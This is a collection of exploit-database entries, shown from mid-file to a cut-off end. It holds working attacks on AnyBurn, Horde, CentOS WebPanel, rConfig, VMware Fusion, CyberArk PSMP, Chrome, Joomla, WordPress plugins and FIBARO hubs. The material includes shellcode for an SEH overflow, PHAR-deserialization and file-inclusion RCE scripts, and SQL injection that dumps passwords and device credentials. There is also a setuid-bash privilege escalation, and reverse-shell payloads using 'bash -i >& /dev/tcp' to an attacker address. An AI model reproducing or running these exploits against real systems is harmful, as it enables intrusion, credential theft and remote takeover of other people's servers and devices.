buf += b"\x4b\x4f\x48\x55\x4f\x4c\x4d\x36\x53\x4c\x4c\x4a\x35"
buf += b"\x30\x4b\x4b\x39\x50\x42\x55\x4c\x45\x57\x4b\x4f\x57"
buf += b"\x4d\x43\x52\x52\x32\x4f\x42\x4a\x4d\x30\x42\x33\x4b"
buf += b"\x4f\x4a\x35\x32\x43\x51\x51\x42\x4c\x52\x43\x4e\x4e"
buf += b"\x53\x35\x42\x58\x52\x45\x4d\x30\x41\x41"
#Filler padding after payload code to bring us to nseh offset
#auto calculated in case payload size changes
junk1 = "\x71" * int(nseh_offset-(len(junk)+len(buf)))
#SEH Overwrite
nSeh = "\x61\x70"
#Unicode safe SEH return
seh = "\x09\x48"
#Stack realignment which takes us directly back into shellcode
eax_align = "\x70\x71\x71\x71"
eax_align += "\x54"
eax_align += "\x47"
eax_align += "\x58"
eax_align += "\x47"
eax_align += "\x05\x2F\x11"
eax_align += "\x47"
eax_align += "\x2d\x01\x11"
eax_align += "\x47"
eax_align += "\x50"
eax_align += "\x47"
eax_align += "\xc3"
#Padding to take us to 10,000
padding = "\x71" * int(crash_buffer_size-(len(junk)+len(buf)+len(junk1)+len(nSeh)+len(seh)+len(eax_align)))
#Assembly of parts
buffer=junk+buf+junk1+nSeh+seh+eax_align+padding
try:
f=open("payload.txt","w")
print "\nAnyBurn Version 4.8 (32-bit) Exploit\n"
print "Software Link : http://www.anyburn.com/anyburn_setup.exe"
print "Exploit Authors: Richard Davy/Gary Nield"
print "Tested on: Windows 10 Enterprise x64"
print "Vulnerability Type: Buffer Overflow/SEH/Unicode\n"
print "Steps to Produce the Exploit:"
print "1.- Run python code"
print "2.- Open payload.txt and copy content to clipboard"
print "3.- Open AnyBurn choose 'Copy disk to image file'"
print "4.- Paste the content of payload.txt into the field: 'Select image file name'"
print "5.- Click 'Create Now' and you will see a crash and the payload launch.\n"
print "[+] Creating %s bytes evil payload " %len(buffer)
f.write(buffer)
f.close()
print "[+] File payload.txt created..."
except:
print "[!] File cannot be created..."
## exploit-phar-loading.py
#!/usr/bin/env python3
from horde import Horde
import requests
import subprocess
import sys
TEMP_DIR = '/tmp'
WWW_ROOT = '/var/www/html'
if len(sys.argv) < 5:
print('Usage: <base_url> <username> <password> <filename> <php_code>')
sys.exit(1)
base_url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
filename = sys.argv[4]
php_code = sys.argv[5]
source = '{}/{}.phar'.format(TEMP_DIR, filename)
destination = '{}/static/{}.php'.format(WWW_ROOT, filename) # destination (delete manually)
temp = 'temp.phar'
url = '{}/static/{}.php'.format(base_url, filename)
# log into the web application
horde = Horde(base_url, username, password)
# create a PHAR that performs a rename when loaded and runs the payload when executed
subprocess.run([
'php', 'create-renaming-phar.php',
temp, source, destination, php_code
], stderr=subprocess.DEVNULL)
# upload the PHAR
with open(temp, 'rb') as fs:
phar_data = fs.read()
horde.upload_to_tmp('{}.phar'.format(filename), phar_data)
# load the phar thus triggering the rename
horde.trigger_phar(source)
# issue a request to trigger the payload
response = requests.get(url)
print(response.text)
## exploit-phar-loading.py EOF
## create-renaming-phar.php
#!/usr/bin/env php
<?php
// the __destruct method of Horde_Auth_Passwd eventually calls
// rename($this->_lockfile, $this->_params['filename']) if $this->_locked
class Horde_Auth_Passwd {
// visibility must match since protected members are prefixed by "\x00*\x00"
protected $_locked;
protected $_params;
function __construct($source, $destination) {
$this->_params = array('filename' => $destination);
$this->_locked = true;
$this->_lockfile = $source;
}
};
function createPhar($path, $source, $destination, $stub) {
// create the object and specify source and destination files
$object = new Horde_Auth_Passwd($source, $destination);
// create the PHAR
$phar = new Phar($path);
$phar->startBuffering();
$phar->addFromString('x', '');
$phar->setStub("<?php $stub __HALT_COMPILER();");
$phar->setMetadata($object);
$phar->stopBuffering();
}
function main() {
global $argc, $argv;
// check arguments
if ($argc != 5) {
fwrite(STDERR, "Usage: <path> <source> <destination> <stub>\n");
exit(1);
}
// create a fresh new phar
$path = $argv[1];
$source = $argv[2];
$destination = $argv[3];
$stub = $argv[4];
@unlink($path);
createPhar($path, $source, $destination, $stub);
}
main();
## create-renaming-phar.php EOF
## horde.py
import re
import requests
class Horde():
def __init__(self, base_url, username, password):
self.base_url = base_url
self.username = username
self.password = password
self.session = requests.session()
self.token = None
self._login()
def _login(self):
url = '{}/login.php'.format(self.base_url)
data = {
'login_post': 1,
'horde_user': self.username,
'horde_pass': self.password
}
response = self.session.post(url, data=data)
token_match = re.search(r'"TOKEN":"([^"]+)"', response.text)
assert (
len(response.history) == 1 and
response.history[0].status_code == 302 and
response.history[0].headers['location'] == '/services/portal/' and
token_match
), 'Cannot log in'
self.token = token_match.group(1)
def upload_to_tmp(self, filename, data):
url = '{}/turba/add.php'.format(self.base_url)
files = {
'object[photo][img][file]': (None, filename),
'object[photo][new]': ('x', data)
}
response = self.session.post(url, files=files)
assert response.status_code == 200, 'Cannot upload the file to tmp'
def include_remote_inc_file(self, path):
# vulnerable block (alternatively 'trean:trean_Block_Mostclicked')
app = 'trean:trean_Block_Bookmarks'
# add one dummy bookmark (to be sure)
url = '{}/trean/add.php'.format(self.base_url)
data = {
'actionID': 'add_bookmark',
'url': 'x'
}
response = self.session.post(url, data=data)
assert response.status_code == 200, 'Cannot add the bookmark'
# add bookmark block
url = '{}/services/portal/edit.php'.format(self.base_url)
data = {
'token': self.token,
'row': 0,
'col': 0,
'action': 'save-resume',
'app': app,
}
response = self.session.post(url, data=data)
assert response.status_code == 200, 'Cannot add the bookmark block'
# edit bookmark block
url = '{}/services/portal/edit.php'.format(self.base_url)
data = {
'token': self.token,
'row': 0,
'col': 0,
'action': 'save',
'app': app,
'params[template]': '../../../../../../../../../../../' + path
}
response = self.session.post(url, data=data)
assert response.status_code == 200, 'Cannot edit the bookmark block'
# evaluate the remote file
url = '{}/services/portal/'.format(self.base_url)
response = self.session.get(url)
print(response.text)
# remove the bookmark block so to not break the page
url = '{}/services/portal/edit.php'.format(self.base_url)
data = {
# XXX token not needed here
'row': 0,
'col': 0,
'action': 'removeBlock'
}
response = self.session.post(url, data=data)
assert response.status_code == 200, 'Cannot reset the bookmark block'
def trigger_phar(self, path):
# vulnerable block (alternatively the same can be obtained by creating a
# bookmark with the PHAR path and clocking on it)
app = 'horde:horde_Block_Feed'
# add syndicated feed block
url = '{}/services/portal/edit.php'.format(self.base_url)
data = {
'token': self.token,
'row': 0,
'col': 0,
'action': 'save-resume',
'app': app,
}
response = self.session.post(url, data=data)
assert response.status_code == 200, 'Cannot add the syndicated feed block'
# edit syndicated feed block
url = '{}/services/portal/edit.php'.format(self.base_url)
data = {
'token': self.token,
'row': 0,
'col': 0,
'action': 'save',
'app': app,
'params[uri]': 'phar://{}'.format(path)
}
response = self.session.post(url, data=data)
assert response.status_code == 200, 'Cannot edit the syndicated feed block'
# load the PHAR archive
url = '{}/services/portal/'.format(self.base_url)
response = self.session.get(url)
# remove the syndicated feed block so to not break the page
url = '{}/services/portal/edit.php'.format(self.base_url)
data = {
# XXX token not needed here
'row': 0,
'col': 0,
'action': 'removeBlock'
}
response = self.session.post(url, data=data)
assert response.status_code == 200, 'Cannot reset the syndicated feed block'
## horde.py EOF
# Exploit Title: Centos WebPanel 7 - 'term' SQL Injection
# Google Dork: N/A
# Date: 2020-03-03
# Exploit Author: Berke YILMAZ
# Vendor Homepage: http://centos-webpanel.com/
# Software Link: http://centos-webpanel.com/
# Version: v6 - v7
# Tested on: Kali Linux - Windows 10
# CVE : CVE-2020-10230
# Type: Error Based SQL Injection
# Payload:
https://{DOMAIN_NAME}:2031/cwp_{SESSION_HASH}/admin/loader_ajax.php?ajax=dashboard&action=searchIn&term=a'
AND (SELECT 1197 FROM(SELECT COUNT(*),CONCAT(0x716b6a7171,(SELECT
(ELT(1197=1197,1))),0x71707a7671,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- aRuO
# Type: Time Based SQL Injection
# Payload:
https://{DOMAIN_NAME}:2031/cwp_{SESSION_HASH}/admin/loader_ajax.php?ajax=dashboard&action=searchIn&term=a'
OR SLEEP(5)-- JCpP
Centos-Webpanel (http://centos-webpanel.com/)
CentOS Web Panel | Free Linux Web Hosting Control Panel
Free CentOS Linux Web Hosting control panel designed for quick and easy
management of (Dedicated & VPS) servers without of need to use ssh console
for every little thing
# Exploit Title: rConfig 3.9 - 'searchColumn' SQL Injection
# Exploit Author: vikingfr
# Date: 2020-03-03
# CVE-2020-10220
# Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py
# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)
# Software Link : https://www.rconfig.com/downloads/rconfig-3.9.4.zip
# Install scripts :
# https://www.rconfig.com/downloads/scripts/install_rConfig.sh
# https://www.rconfig.com/downloads/scripts/centos7_install.sh
# https://www.rconfig.com/downloads/scripts/centos6_install.sh
# Version: tested v3.9.4
# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24
#
# Notes : If you want to reproduce in your lab environment follow those links :
# http://help.rconfig.com/gettingstarted/installation
# then
# http://help.rconfig.com/gettingstarted/postinstall
#
# $ python3 rconfig_sqli.py https://1.1.1.1
# rconfig 3.9 - SQL Injection PoC
# [+] Triggering the payloads on https://1.1.1.1/commands.inc.php
# [+] Extracting the current DB name :
# rconfig2
# [+] Extracting 10 first users :
# admin:1:63a9f0ea7bb98050796b649e85481845
# Maybe no more information ?
# Maybe no more information ?
# [snip]
# [+] Extracting 10 first devices :
# 127-0-0-1:127.0.0.1::ocdvulnpass:
# deviceTestName:1.1.1.1:myusertest:mysecret:myenablesecret
# Maybe no more information ?
# Maybe no more information ?
# [snip]
# Done
#!/usr/bin/python3
import requests
import sys
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
print ("rconfig 3.9 - SQL Injection PoC")
if len(sys.argv) != 2:
print ("[+] Usage : ./rconfig_exploit.py https://target")
exit()
vuln_page="/commands.inc.php"
vuln_parameters="?searchOption=contains&searchField=vuln&search=search&searchColumn=command"
given_target = sys.argv[1]
target = given_target
target += vuln_page
target += vuln_parameters
request = requests.session()
dashboard_request = request.get(target+vuln_page, allow_redirects=False, verify=False)
def extractDBinfos(myTarget=None,myPayload=None):
"""
Extract information from database
Args:
- target+payload (String)
Returns:
- payload result (String)
"""
result = ""
encoded_request = myTarget+myPayload
exploit_req = request.get(encoded_request)
if '[PWN]' in str(exploit_req.content):
result = str(exploit_req.content).split('[PWN]')[1]
else:
result="Maybe no more information ?"
return result
if dashboard_request.status_code != 404:
print ("[+] Triggering the payloads on "+given_target+vuln_page)
# get the db name
print ("[+] Extracting the current DB name :")
db_payload = "%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,database(),0x5B50574E5D3C42523E)%20limit%200,1),NULL--"
db_name = extractDBinfos(target,db_payload)
print (db_name)
# DB extract users
print ("[+] Extracting 10 first users :")
for i in range (0, 10):
user1_payload="%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,username,0x3A,id,0x3A,password,0x5B50574E5D3C42523E)%20FROM%20"+db_name+".users+limit+"+str(i)+","+str(i+1)+"),NULL--"
user_h = extractDBinfos(target,user1_payload)
#print ("[+] Dump device "+str(i))
print (user_h)
# DB extract devices information
print ("[+] Extracting 10 first devices :")
for i in range (0, 10):
device_payload="%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,deviceName,0x3A,deviceIpAddr,0x3A,deviceUsername,0x3A,devicePassword,0x3A,deviceEnablePassword,0x5B50574E5D3C42523E)%20FROM%20"+db_name+".nodes+limit+"+str(i)+","+str(i+1)+"),NULL--"
device_h = extractDBinfos(target,device_payload)
#print ("[+] Dump device "+str(i))
print (device_h)
print ("Done")
else:
print ("[-] Please verify the URI")
exit()
## exploit-inc-inclusion.py
#!/usr/bin/env python3
from horde import Horde
import subprocess
import sys
TEMP_DIR = '/tmp'
if len(sys.argv) < 5:
print('Usage: <base_url> <username> <password> <filename> <php_code>')
sys.exit(1)
base_url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
filename = sys.argv[4]
php_code = sys.argv[5]
# log into the web application
horde = Horde(base_url, username, password)
# upload (delete manually) and evaluate the .inc file
horde.upload_to_tmp('{}.inc'.format(filename), '<?php {} die();'.format(php_code))
horde.include_remote_inc_file('{}/{}'.format(TEMP_DIR, filename))
## exploit-inc-inclusion.py EOF
## horde.py
import re
import requests
class Horde():
def __init__(self, base_url, username, password):
self.base_url = base_url
self.username = username
self.password = password
self.session = requests.session()
self.token = None
self._login()
def _login(self):
url = '{}/login.php'.format(self.base_url)
data = {
'login_post': 1,
'horde_user': self.username,
'horde_pass': self.password
}
response = self.session.post(url, data=data)
token_match = re.search(r'"TOKEN":"([^"]+)"', response.text)
assert (
len(response.history) == 1 and
response.history[0].status_code == 302 and
response.history[0].headers['location'] == '/services/portal/' and
token_match
), 'Cannot log in'
self.token = token_match.group(1)
def upload_to_tmp(self, filename, data):
url = '{}/turba/add.php'.format(self.base_url)
files = {
'object[photo][img][file]': (None, filename),
'object[photo][new]': ('x', data)
}
response = self.session.post(url, files=files)
assert response.status_code == 200, 'Cannot upload the file to tmp'
def include_remote_inc_file(self, path):
# vulnerable block (alternatively 'trean:trean_Block_Mostclicked')
app = 'trean:trean_Block_Bookmarks'
# add one dummy bookmark (to be sure)
url = '{}/trean/add.php'.format(self.base_url)
data = {
'actionID': 'add_bookmark',
'url': 'x'
}
response = self.session.post(url, data=data)
assert response.status_code == 200, 'Cannot add the bookmark'
# add bookmark block
url = '{}/services/portal/edit.php'.format(self.base_url)
data = {
'token': self.token,
'row': 0,
'col': 0,
'action': 'save-resume',
'app': app,
}
response = self.session.post(url, data=data)
assert response.status_code == 200, 'Cannot add the bookmark block'
# edit bookmark block
url = '{}/services/portal/edit.php'.format(self.base_url)
data = {
'token': self.token,
'row': 0,
'col': 0,
'action': 'save',
'app': app,
'params[template]': '../../../../../../../../../../../' + path
}
response = self.session.post(url, data=data)
assert response.status_code == 200, 'Cannot edit the bookmark block'
# evaluate the remote file
url = '{}/services/portal/'.format(self.base_url)
response = self.session.get(url)
print(response.text)
# remove the bookmark block so to not break the page
url = '{}/services/portal/edit.php'.format(self.base_url)
data = {
# XXX token not needed here
'row': 0,
'col': 0,
'action': 'removeBlock'
}
response = self.session.post(url, data=data)
assert response.status_code == 200, 'Cannot reset the bookmark block'
def trigger_phar(self, path):
# vulnerable block (alternatively the same can be obtained by creating a
# bookmark with the PHAR path and clocking on it)
app = 'horde:horde_Block_Feed'
# add syndicated feed block
url = '{}/services/portal/edit.php'.format(self.base_url)
data = {
'token': self.token,
'row': 0,
'col': 0,
'action': 'save-resume',
'app': app,
}
response = self.session.post(url, data=data)
assert response.status_code == 200, 'Cannot add the syndicated feed block'
# edit syndicated feed block
url = '{}/services/portal/edit.php'.format(self.base_url)
data = {
'token': self.token,
'row': 0,
'col': 0,
'action': 'save',
'app': app,
'params[uri]': 'phar://{}'.format(path)
}
response = self.session.post(url, data=data)
assert response.status_code == 200, 'Cannot edit the syndicated feed block'
# load the PHAR archive
url = '{}/services/portal/'.format(self.base_url)
response = self.session.get(url)
# remove the syndicated feed block so to not break the page
url = '{}/services/portal/edit.php'.format(self.base_url)
data = {
# XXX token not needed here
'row': 0,
'col': 0,
'action': 'removeBlock'
}
response = self.session.post(url, data=data)
assert response.status_code == 200, 'Cannot reset the syndicated feed block'
## horde.py EOF
# Exploit Title: ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service (PoC)
# Author: Ivan Marmolejo
# Date: 2020-03-22
# Vendor Homepage: https://apps.apple.com/us/app/proficyscada/id525792142
# Software Link: App Store for iOS devices
# Tested Version: 5.0.25920
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 6s iOS 13.3
Steps to Produce the Crash:
1.- Run python code: ProficySCADA.py
2.- Copy content to clipboard
3.- Open "ProficySCADA for iOS"
4.- Add
5.- Username --> admin
6.- Paste ClipBoard on "Password"
7.- Add
8.- Connect
9.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 257
print (buffer)
# Exploit Title: VMware Fusion 11.5.2 - Privilege Escalation
# Date: 2020-03-17
# Exploit Author: Rich Mirch
# Vendor Homepage: https://www.vmware.com/products/fusion.html
# Vendor Advisory: https://www.vmware.com/security/advisories/VMSA-2020-0005.html
# Software Link: https://download3.vmware.com/software/fusion/file/VMware-Fusion-11.5.1-15018442.dmg
# Versions:
# VMware Fusion Professional 11.5.1 (15018442)
# VMware Fusion Professional 11.5.2 (15794494)
#
# Tested on: macOS 10.14.6
# CVE : CVE-2020-3950
# Source PoC: https://raw.githubusercontent.com/mirchr/security-research/master/vulnerabilities/CVE-2020-3950.sh
#
#
#!/bin/bash
echo "CVE-2020-3950 VMware Fusion EoP PoC by @0xm1rch"
mkdir -p ~/a/b/c
mkdir -p ~/Contents/Library/services
cat > ~/Contents/Library/services/VMware\ USB\ Arbitrator\ Service <<EOF
#!/usr/bin/python
import os
os.setuid(0)
os.system("cp /bin/bash $HOME/.woot;chmod 4755 $HOME/.woot");
EOF
chmod 755 ~/Contents/Library/services/VMware\ USB\ Arbitrator\ Service
cd ~/a/b/c
ln "/Applications/VMware Fusion.app/Contents/Library/services/Open VMware USB Arbitrator Service" . 2>/dev/null
"${PWD}/Open VMware USB Arbitrator Service" >/dev/null 2>/dev/null &
p=$!
echo "Sleeping for 5 seconds"
sleep 5
kill ${p?}
wait
echo "Sleeping for 7 seconds"
sleep 7
$HOME/.woot -p
* Exploit Title: Wordpress Plugin PicUploader 1.0 - Remote File Upload
* Google Dork: N/A
* Date: 2020.03.22
* Exploit Author: Milad Karimi
* Vendor Homepage: https://github.com/xiebruce/PicUploader
* Software Link: https://github.com/xiebruce/PicUploader
* Category : webapps
* Version: 1.0
* Tested on: windows 10 , firefox
* CVE : N/A
Vulnerable Source:
88: move_uploaded_file move_uploaded_file($tmp_name, $dest))
86: foreach($files['tmp_name'] as $key=>$tmp_name)
80: $files = $_FILES['file']){
72: $_FILES['file'] = $_FILES[$plugin]; // if(isset($_FILES)),
87: $dest = $tmpDir . '/' . $files['name'][$key];
81: $tmpDir = APP_PATH . '/.tmp';
24: define('APP_PATH', strtr(__DIR__, '\\', '/')); // define()
80: $files = $_FILES['file']){
72: $_FILES['file'] = $_FILES[$plugin]; // if(isset($_FILES)),
80: if(isset($_FILES['file']) && $files = $_FILES['file'])
84: if(is_array($files['tmp_name']))
Exploit:
<?php
$shahab="file.jpg";
$ch = curl_init("http://localhost/wordpress/wp-content/pluginsPicUploader-master/index.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('zip'=>"@$shahab"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
print "$result";
?>
Location File:
http://localhost/wordpress/wp-content/plugins/PicUploader/file.jpg
# Exploit Title: CyberArk PSMP 10.9.1 - Policy Restriction Bypass
# Google Dork: NA
# Date: 2020-02-25
# Exploit Author: LAHBAL Said
# Vendor Homepage: https://www.cyberark.com/
# Software Link: https://www.cyberark.com/
# Version: PSMP <=10.9.1
# Tested on: PSMP 10.9 & PSMP 10.9.1
# CVE : N/A
# Patched : PSMP >= 11.1
[Prerequisites]
Policy allows us to overwrite PSMRemoteMachine
[Description]
An issue was discovered in CyberArk Privileged Session Manager SSH Proxy
(PSMP)
through 10.9.1.
All recordings mechanisms (Keystoke, SSH Text Recorder and video) can be
evaded
because users entries are not properly validated.
Commands executed in a reverse shell are not monitored.
The connection process will freeze just after the "session is being
recorded" banner and the all commands we enter are not monitored.
------------------------------------------
[Additional Information]
We can got a reverse shell (or execute any command we want) from remote
target and be completely invisible from CyberArk. In logs, we have only
both PSMConnect and PSMDisconnect events.
Here are details of the attack :
1. I connect through CyberArk PSMP server using this
connection string : ssh <vaultUserName>%username+address%'remoteMachine
bash -i >& /dev/tcp/<AttackerIP>/<AttackerPort0>&1'@<psmpServer>
Example : ssh slahbal%sharedLinuxAccount+test.intra%'linux01 bash -i >&
/dev/tcp/192.168.0.10/443 0>&1'@psmp
3. This connection string will :
- Connect me to linux01 using sharedLinuxAccount account that is stored
into CyberArk and to which I have access.
- Create a reverse shell to my workstation 192.168.0.10:443 (nc.exe is
listening on port 443 for this test).
4. The connection process will freeze just after "The sessions is being
recorded" banner
5. I got a reverse shell on which all commands ar not monitored.
Note 1 : The command that created the reverse shell is NOT captured by
CyberArk.
Note 2 : sshd_config has been set with those parameters :
PSMP_AdditionalDelimiter %
PSMP_TargetAddressPortAdditionalDelimiter +
------------------------------------------
[VulnerabilityType Other]
Bypass all recordings mechanisms (Keystoke, SSH Text Recorder and video)
------------------------------------------
[Vendor of Product]
CyberArk
------------------------------------------
[Affected Product Code Base]
PSMP - <=10.9.1
------------------------------------------
[Affected Component]
/opt/CARKpsmp/bin/psmpserver
------------------------------------------
[Attack Type]
Local
------------------------------------------
[CVE Impact Other]
The vulnerability allow you to connect through CyberArk PSMP server
bypassing all recordings mechanisms
------------------------------------------
[Attack Vectors]
To exploit the vulnerability, someone must connect through PSMP using a
crafted connection string.
------------------------------------------
[Has vendor confirmed or acknowledged the vulnerability?]
true
# Exploit Title: Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service (PoC)
# Google Dork: N/A
# Date: 2020-02-21
# Exploit Author: Cem Onat Karagun of Diesec GmBH
# Vendor Homepage: https://www.google.com/
# Version: Google Chrome 80.0.3987.87
# Tested on: Windows x64 / Linux Debian x64 / MacOS
# CVE: CVE-2020-6404
# PoC Video: http://www.youtube.com/watch?v=tv5sDDwiWg8
# Description: https://bugs.chromium.org/p/chromium/issues/detail?id=1024256
Thread 35 "Chrome_InProcRe" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7f2cbf9ad700 (LWP 3275)]
[----------------------------------registers-----------------------------------]
RAX: 0x7f2cbe98d100 --> 0x41b58ab3
RBX: 0x7f2cbf9aa9c0 --> 0xfe597d7178d --> 0x0
RCX: 0x1fffffffffffffff
RDX: 0x7f2cbeb8bdf4 --> 0x0
RSI: 0x7f2cbeb8bdc0 --> 0x613000000000 --> 0xcc6e96b9 --> 0x0
RDI: 0x0
RBP: 0x7f2cbf9aaa70 --> 0x7f2cbf9aabf0 --> 0x7f2cbf9aad10 -->
0x7f2cbf9aadd0 --> 0x7f2cbf9aaea0 --> 0x7f2cbf9aafb0 (--> ...)
RSP: 0x7f2cbf9aa9c0 --> 0xfe597d7178d --> 0x0
RIP: 0x559e50c11189 (<RangeFromBufferIndex()+377>: mov cl,BYTE PTR
[rcx+0x7fff8000])
R8 : 0xfffffffffffffff8
R9 : 0x0
R10: 0x7f2cbec6a670 --> 0x7f2cbec6a070 --> 0xd47000000000000 ('')
R11: 0x7f2cbe98d100 --> 0x41b58ab3
R12: 0xfe597d31a20 --> 0x0
R13: 0x7f2cbeb8bde8 --> 0x0
R14: 0x0
R15: 0x2
EFLAGS: 0x10a06 (carry PARITY adjust zero sign trap INTERRUPT direction
OVERFLOW)
[-------------------------------------code-------------------------------------]
0x559e50c1117e <RangeFromBufferIndex()+366>: lea r8,[rdi-0x8]
0x559e50c11182 <RangeFromBufferIndex()+370>: mov rcx,r8
0x559e50c11185 <RangeFromBufferIndex()+373>: shr rcx,0x3
=> 0x559e50c11189 <RangeFromBufferIndex()+377>: mov cl,BYTE PTR
[rcx+0x7fff8000]
0x559e50c1118f <RangeFromBufferIndex()+383>: test cl,cl
0x559e50c11191 <RangeFromBufferIndex()+385>:
jne 0x559e50c11418 <RangeFromBufferIndex()+1032>
0x559e50c11197 <RangeFromBufferIndex()+391>: add
rdi,0xffffffffffffffff
0x559e50c1119b <RangeFromBufferIndex()+395>: mov rcx,rdi
[------------------------------------stack-------------------------------------]
0000| 0x7f2cbf9aa9c0 --> 0xfe597d7178d --> 0x0
0008| 0x7f2cbf9aa9c8 --> 0xc0c001162e6 --> 0x0
0016| 0x7f2cbf9aa9d0 --> 0xfe597d717be --> 0x0
0024| 0x7f2cbf9aa9d8 --> 0xfe597d717bd --> 0x0
0032| 0x7f2cbf9aa9e0 --> 0x7f2cbeb8bdf4 --> 0x0
0040| 0x7f2cbf9aa9e8 --> 0x7f2cbeb8bea0 --> 0x6060008b1720 -->
0x602000098630 --> 0x200000003 --> 0x0
0048| 0x7f2cbf9aa9f0 --> 0x21bec4d308 --> 0x0
0056| 0x7f2cbf9aa9f8 --> 0xfe597cfab48 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000559e50c11189 in MappingForIndex ()
at
../../third_party/blink/renderer/core/editing/finder/find_buffer.cc:450
450
../../third_party/blink/renderer/core/editing/finder/find_buffer.cc: No
such file or directory.
<!DOCTYPE html>
<head>
<script type="text/javascript">
document.addEventListener("DOMContentLoaded", function(){
find(decodeURIComponent('\uFFFC'));
});
</script>
</head>
<body>
<legend></legend>
</body>
</html>
# Exploit Title: Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection
# Dork: inurl:"index.php?option=com_hdwplayer"
# Date: 2020-03-23
# Exploit Author: qw3rTyTy
# Vendor Homepage: https://www.hdwplayer.com/
# Software Link: https://www.hdwplayer.com/download/
# Version: 4.2
# Tested on: Debian/Nginx/Joomla! 3.9.11
##########################################################################
#Vulnerability details
##########################################################################
File: components/com_hdwplayer/models/search.php
Func: HdwplayerModelSearch::getsearch
Line: 33
16 class HdwplayerModelSearch extends HdwplayerModel {
...snip...
30 function getsearch() {
31 $db = JFactory::getDBO();
32 $search = JRequest::getVar('hdwplayersearch', '', 'post', 'string');
33 $query = "SELECT * FROM #__hdwplayer_videos WHERE published=1 AND (title LIKE '%$search%' OR category LIKE '%$search%' OR tags LIKE '%$search%')"; //!!!
34
35 $db->setQuery($query);
36 $output = $db->loadObjectList();
37 return($output);
38 }
39
40 }
41
42 ?>
##########################################################################
#PoC
##########################################################################
$> python ./sqlmap.py -u "http://127.0.0.1/joomla/index.php" --method=POST --random-agent --data "option=com_hdwplayer&view=search&hdwplayersearch=xxx" --level=5 --risk=3 --dbms=mysql -p hdwplayersearch
# Exploit Title: rConfig 3.9.4 - 'search.crud.php' Remote Command Injection
# Date: 2020-03-21
# Exploit Author: Matthew Aberegg, Michael Burkey
# Vendor Homepage: https://www.rconfig.com
# Software Link: https://www.rconfig.com/downloads/rconfig-3.9.4.zip
# Version: rConfig 3.9.4
# Tested on: Cent OS 7 (1908)
# CVE: CVE-2020-10879
#!/usr/bin/python3
import requests
import sys
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
if len(sys.argv) != 6:
print("[~] Usage : https://rconfig_host, Username, Password, Attacker IP, Attacker Port")
exit()
host = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
attacker_ip = sys.argv[4]
attacker_port = sys.argv[5]
login_url = host + "/lib/crud/userprocess.php"
payload = "|| bash -i >& /dev/tcp/{0}/{1} 0>&1 ;".format(attacker_ip, attacker_port)
encoded_payload = urllib.parse.quote_plus(payload)
def exploit():
s = requests.Session()
res = s.post(
login_url,
data={
'user': username,
'pass': password,
'sublogin': 1
},
verify=False,
allow_redirects=True
)
injection_url = "{0}/lib/crud/search.crud.php?searchTerm=test&catId=2&numLineStr=&nodeId={1}&catCommand=showcdpneigh*.txt&noLines=".format(host, encoded_payload)
res = s.get(injection_url, verify=False)
if res.status_code != 200:
print("[~] Failed to connect")
if __name__ == '__main__':
exploit()
# Exploit Title: FIBARO System Home Center 5.021 - Remote File Include
# Date: 2020-03-22
# Author: LiquidWorm
# Vendor: https://www.fibaro.com
# CVE: N/A
Vendor: FIBAR GROUP S.A.
Product web page: https://www.fibaro.com
Affected version: Home Center 3, Home Center 2, Home Center Lite
5.021.38
4.580
4.570
4.540
4.530
4.510
4.180
Summary: Imagine that you live in a house where everything happens by itself.
FIBARO Smart Home takes care of your everyday comfort and safety of all family
members and in the meantime, saves energy on every single occasion. All this is
possible thanks to Home Center 2 smart home HUB. Home Center 2 is an indispensable
part of the FIBARO System without which the rest devices of home automation would
be only beautiful objects. The smart home HUB collects and analyzes information
about devices, communicates them with each other and thus directs the operation
of the entire system and takes care of its security.
Desc: The smart home solution is vulnerable to a remote Cross-Site Scripting
triggered via a Remote File Inclusion issue by including arbitrary client-side
dynamic scripts (JavaScript, VBScript) due to the undocumented proxy API and its
url GET parameter. This allows hijacking the current session of the user or
changing the look of the page by changing the HTML.
Tested on: Apache/2.2.16 (Debian)
nginx/1.9.5
nginx/1.8.0
lighttpd/1.4.41
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5563
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5563.php
04.02.2020
--
http://10.0.0.2:8880/api/proxy?url=https://www.zeroscience.mk/pentest/XSS.svg
$ cat /pentest/XSS.svg
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
# Exploit Title: Wordpress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting
# Date: 2020-02-18
# Vendor Homepage: https://wpforms.com
# Vendor Changelog: https://wordpress.org/plugins/wpforms-lite/#developers
# Exploit Author: Jinson Varghese Behanan
# Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/stored-xss-vulnerability-found-in-wpforms-plugin/
# Author Homepage: https://www.jinsonvarghese.com
# Version: 1.5.8.2 and below
# CVE : CVE-2020-10385
1. Description
